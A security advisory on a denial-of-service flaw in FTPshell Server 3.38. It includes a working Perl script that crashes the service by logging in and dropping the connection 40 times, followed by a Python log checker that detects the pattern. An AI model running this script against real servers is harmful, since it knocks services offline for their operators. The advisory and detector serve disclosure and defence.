FTPshell Server DoS
Summary
"FTPShell server is a windows FTP service that enables remote file downloads and uploads."
Improper freeing of resources allows attackers to cause the FTPshell Server to crash.
Credit:
The information has been provided by Reed Arvin.
The original article can be found at: http://reedarvin.thearvins.com/20050725-01.html
Details
Vulnerable Systems:
* FTPshell Server Version 3.38
Logging into the FTP server successfully and then abruptly closing the connection (without using the QUIT command) more than 39 times in succession will cause the ftpshelld.exe process to die.
Exploit:
#===== Start FTPShell_FTPDOS.pl =====
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
# FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################
use IO::Socket;
use Win32;
use strict;

my($i) = "";
my($socket) = "";

# Repeat the login-then-drop sequence 40 times (the crash is reported
# after more than 39 abrupt closes in succession).
for ($i = 1; $i <= 40; $i++)
{
    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => "21",
                                        Proto    => "TCP"))
    {
        print "Login \#$i\n";
        Win32::Sleep(300);
        print $socket "USER $ARGV[1]\r\n";
        Win32::Sleep(100);
        print $socket "PASS $ARGV[2]\r\n";
        Win32::Sleep(100);
        print $socket "PORT 127,0,0,1,18,12\r\n";
        Win32::Sleep(100);
        # Close the connection without sending QUIT.
        close($socket);
    }
    else
    {
        print "Cannot connect to $ARGV[0]:21\n";
    }
}
#===== End FTPShell_FTPDOS.pl =====
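
A defender-side check for the pattern described under Details, as an added example that is not part of the original advisory: it counts, per client, consecutive logged-in sessions that ended without QUIT and reports clients that reach a threshold. The log format, the threshold, the time window and the sample data are assumptions; FTPshell's own log layout is not given on this page.

```python
from collections import defaultdict

# Assumed log format (constructed for this example, not FTPshell's own):
#   "<epoch_seconds> <client_ip> <session_id> <LOGIN_OK|QUIT|DISCONNECT>"
THRESHOLD = 10   # alert well below the 40 closes the advisory reports as fatal
MAX_GAP = 60     # seconds between closes still counted as "in succession"

def find_abrupt_close_streaks(lines, threshold=THRESHOLD, max_gap=MAX_GAP):
    """Map client IP to its longest run of logged-in sessions closed without QUIT."""
    sessions = {}                # (ip, sid) -> {"auth": bool, "quit": bool}
    streak = defaultdict(int)    # current consecutive abrupt closes per client
    last = {}                    # time of the previous abrupt close per client
    worst = defaultdict(int)     # longest streak seen per client
    for line in lines:
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue             # skip malformed lines
        ts, ip, sid, event = int(parts[0]), parts[1], parts[2], parts[3]
        state = sessions.setdefault((ip, sid), {"auth": False, "quit": False})
        if event == "LOGIN_OK":
            state["auth"] = True
        elif event == "QUIT":
            state["quit"] = True
        elif event == "DISCONNECT":
            del sessions[(ip, sid)]
            if state["auth"] and state["quit"]:
                streak[ip] = 0   # a clean QUIT breaks the succession
            elif state["auth"]:  # logged in, then dropped without QUIT
                if ts - last.get(ip, ts) > max_gap:
                    streak[ip] = 0   # too slow to count as "in succession"
                streak[ip] += 1
                last[ip] = ts
                worst[ip] = max(worst[ip], streak[ip])
    return {ip: n for ip, n in worst.items() if n >= threshold}

def make_sessions(ip, count, start, clean=False):
    """Constructed sample log lines: `count` sessions from one client, 2 s apart."""
    events = ["LOGIN_OK", "QUIT", "DISCONNECT"] if clean else ["LOGIN_OK", "DISCONNECT"]
    return [f"{start + 2 * n} {ip} {ip}-{start}-{n} {e}"
            for n in range(count) for e in events]

SAMPLE = (make_sessions("192.0.2.10", 12, 1000)                # 12 abrupt closes
          + make_sessions("192.0.2.20", 12, 2000, clean=True)  # 12 clean sessions
          + make_sessions("192.0.2.30", 6, 3000)               # 6 abrupt closes,
          + make_sessions("192.0.2.30", 1, 3012, clean=True)   # one clean QUIT,
          + make_sessions("192.0.2.30", 6, 3014))              # 6 more abrupt

if __name__ == "__main__":
    print(find_abrupt_close_streaks(SAMPLE))
```

The threshold should sit far enough below 40 that the alert fires before the service dies, and high enough that clients with flaky links do not trigger it.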